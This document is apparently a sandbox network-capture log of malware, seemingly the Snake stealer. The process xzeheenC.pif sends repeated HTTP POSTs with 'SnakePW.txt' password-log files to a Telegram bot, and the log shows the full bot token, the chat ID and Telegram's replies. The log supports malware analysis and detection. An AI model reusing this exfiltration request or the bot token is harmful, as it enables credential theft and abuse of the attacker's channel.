                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd2068b658623bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419076,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535888,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        30 | 192.168.2.8 | 49743 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1ffbc3b398fe
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd1ffbc3b398feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:29 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:29 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419078,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535889,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        31 | 192.168.2.8 | 49744 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1faabcbe3ba4
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd1faabcbe3ba4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419080,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535889,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        32 | 192.168.2.8 | 49745 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd207e11dc29ac
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd207e11dc29acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:30 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419082,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535890,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        33 | 192.168.2.8 | 49746 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2015a808a94e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd2015a808a94eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:31 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:31 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419084,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535891,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        34 | 192.168.2.8 | 49747 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:31 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fc0c1b966bb
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:31 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 63 30 63 31 62 39 36 36 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fc0c1b966bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 39 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419086,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535892,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
35          192.168.2.8  49748        149.154.167.220  443               6760  C:\Users\Public\Libraries\xzeheenC.pif

Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:31:31 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2090b25629b5
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:31 UTC  535                OUT        Data Ascii: --------------------------8dd2090b25629b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:32 UTC  388                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:32 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:32 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":419088,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535892,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
36          192.168.2.8  49749        149.154.167.220  443               3428  C:\Users\Public\Libraries\xzeheenC.pif

Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:31:33 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd202e190e4b21
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:33 UTC  535                OUT        Data Ascii: --------------------------8dd202e190e4b21Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:33 UTC  388                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:33 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:33 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":419090,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535893,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
37          192.168.2.8  49750        149.154.167.220  443               7064  C:\Users\Public\Libraries\xzeheenC.pif

Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:31:33 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fd9705a96a3
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:33 UTC  535                OUT        Data Ascii: --------------------------8dd1fd9705a96a3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:34 UTC  388                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:34 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:34 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":419092,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535894,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
38          192.168.2.8  49751        149.154.167.220  443               6760  C:\Users\Public\Libraries\xzeheenC.pif

Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:31:33 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20a88e7882e3
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:33 UTC  535                OUT        Data Ascii: --------------------------8dd20a88e7882e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:34 UTC  388                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:34 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:34 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":419094,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535894,"documen


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
39          192.168.2.8  49752        149.154.167.220  443               3428  C:\Users\Public\Libraries\xzeheenC.pif

Timestamp                Bytes transferred  Direction  Data
2024-12-18 15:31:35 UTC  328                OUT        POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20426636599f
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:35 UTC  535                OUT        Data Ascii: --------------------------8dd20426636599fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:35 UTC  388                IN         HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:35 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:35 UTC  515                IN         Data Ascii: {"ok":true,"result":{"message_id":419096,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535895,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.849753149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fec91a656cd
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:35 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd1fec91a656cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:36 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419098,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535896,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49754 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:35 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20bb0ba85598
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:35 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd20bb0ba85598Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:36 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:36 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419100,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535896,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 49755 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2059540f56aa
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:37 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd2059540f56aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:37 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:37 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:37 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419102,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535897,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49756 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2003b93d294e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:37 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd2003b93d294eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:38 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:38 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:38 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419104,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535898,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49757 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:37 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20cec9e96ae0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:37 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd20cec9e96ae0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:38 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:38 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:38 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419106,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535898,"documen


